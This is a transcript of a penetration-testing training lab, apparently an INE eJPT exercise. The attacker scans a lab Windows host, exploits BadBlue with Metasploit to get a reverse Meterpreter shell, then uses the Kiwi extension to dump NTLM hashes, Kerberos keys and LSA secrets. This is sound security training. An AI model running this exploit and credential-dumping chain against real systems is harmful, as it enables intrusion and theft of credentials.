Lab Name: Windows Meterpreter Kiwi Extension
Platform: INE
Lab No: 16
Exam: eJPT (Jr. Penetartion Tester)
┌──(root㉿attackdefense)-[~]
└─# ping -c 4 demo.ine.local
PING demo.ine.local (10.4.31.182) 56(84) bytes of data.
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=1 ttl=125 time=18.8 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=2 ttl=125 time=8.47 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=3 ttl=125 time=8.44 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=4 ttl=125 time=23.7 ms
--- demo.ine.local ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 8.435/14.866/23.732/6.646 ms
──(root㉿attackdefense)-[~]
└─# nmap demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 02:29 IST
Nmap scan report for demo.ine.local (10.4.31.182)
Host is up (0.0092s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
┌──(root㉿attackdefense)-[~]
└─# msfconsole -q
msf6 > search badblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow
1 exploit/windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow
2 \_ target: BadBlue EE 2.7 Universal . . . .
3 \_ target: BadBlue 2.72b Universal . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/badblue_passthru
After interacting with a module you can manually set a TARGET with set TARGET 'BadBlue 2.72b Universal'
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/badblue_passthru) > set RHOST demo.ine.local
RHOST => demo.ine.local
msf6 exploit(windows/http/badblue_passthru) > exploit
[*] Started reverse TCP handler on 10.10.42.3:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (176198 bytes) to 10.4.31.182
[*] Meterpreter session 1 opened (10.10.42.3:4444 -> 10.4.31.182:49911) at 2024-08-28 02:30:27 +0530
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator ATTACKDEFENSE e3c61a68f1b89ee6c8ba9507378dc88 fa62275e30d286c09d30d8fece82664
d eb34323ef
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
ATTACKDEFENSE$ WORKGROUP (null)
Administrator ATTACKDEFENSE (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator ATTACKDEFENSE (null)
attackdefense$ WORKGROUP (null)
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : ed1f5e64aad3727f03522bbddc080d77
* Primary:Kerberos-Newer-Keys *
Default Salt : ATTACKDEFENSEAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f566d48c0c62f88d997e9e56b52eed1696aead09df3100982bcfc5920655da5d
aes128_hmac (4096) : bf0ca9e206e82ce481c818070bef0855
des_cbc_md5 (4096) : 6d570d08df8979fe
OldCredentials
aes256_hmac (4096) : 69d101a02f3f4648bf9875f10c1cd268d3f500c3253ab862222a9e1bb3740247
aes128_hmac (4096) : 3c3fd899f7f004ed44e9e48f868a5ddc
des_cbc_md5 (4096) : 9b808fb9e0cbb3b5
OlderCredentials
aes256_hmac (4096) : 4cbbe8ad8482ca76952b08cd9103ba91af35c9d8b21a3d49c332e072618a9fa9
aes128_hmac (4096) : b18addd75f8a2b106b262c7b5e517623
des_cbc_md5 (4096) : 7fe0c2a15eb32fcd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : ATTACKDEFENSEAdministrator
Credentials
des_cbc_md5 : 6d570d08df8979fe
OldCredentials
des_cbc_md5 : 9b808fb9e0cbb3b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a1528cd40d99e5dfa9fa0809af998696
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227
des_cbc_md5 (4096) : ce9b2cabd55df4ce
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : ce9b2cabd55df4ce
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8e5edf45f3a42335f1f4906a24a08fe
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-R69684Tstudent
Default Iterations : 4096
Credentials
aes256_hmac (4096) : bab064fdaf62216a1577f1d5cd88e162f6962b4a421d199adf4c66b61ec6ac7c
aes128_hmac (4096) : 42bc1d17d1236d3afc09efbeba547d2c
des_cbc_md5 (4096) : 1a975b02a7bf15d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-R69684Tstudent
Credentials
des_cbc_md5 : 1a975b02a7bf15d5
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local name : ATTACKDEFENSE ( S-1-5-21-3688751335-3073641799-161370460 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {47980b9c-8bd1-89c9-bfb5-0c4fca25e625}
[00] {47980b9c-8bd1-89c9-bfb5-0c4fca25e625} 247e7be223db5e50291fc0fcec276ff8236c32a8a6183c5a0d0b6b044590ce06
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 34 5e 65 80 f9 04 a4 8c a5 0e 6c 74 6c d2 c3 b8 8e 7a ca c3 a3 3b 0e 6e 0a 64 f3 12 fc c7 92 67 a3 2f d5 d1 e4 41 33 ac
full: 345e6580f904a48ca50e6c746cd2c3b88e7acac3a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
m/u : 345e6580f904a48ca50e6c746cd2c3b88e7acac3 / a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
old/hex : 01 00 00 00 c1 3a 28 e3 94 7b 64 5d 94 29 b4 c9 1c 9b 0c b1 b6 5a aa 2c 34 4d ee ed 86 74 0f 12 25 37 8c 38 69 b3 b4 53 b6 37 86 44
full: c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c344deeed86740f1225378c3869b3b453b6378644
m/u : c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c / 344deeed86740f1225378c3869b3b453b6378644
Secret : NL$KM
cur/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
old/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2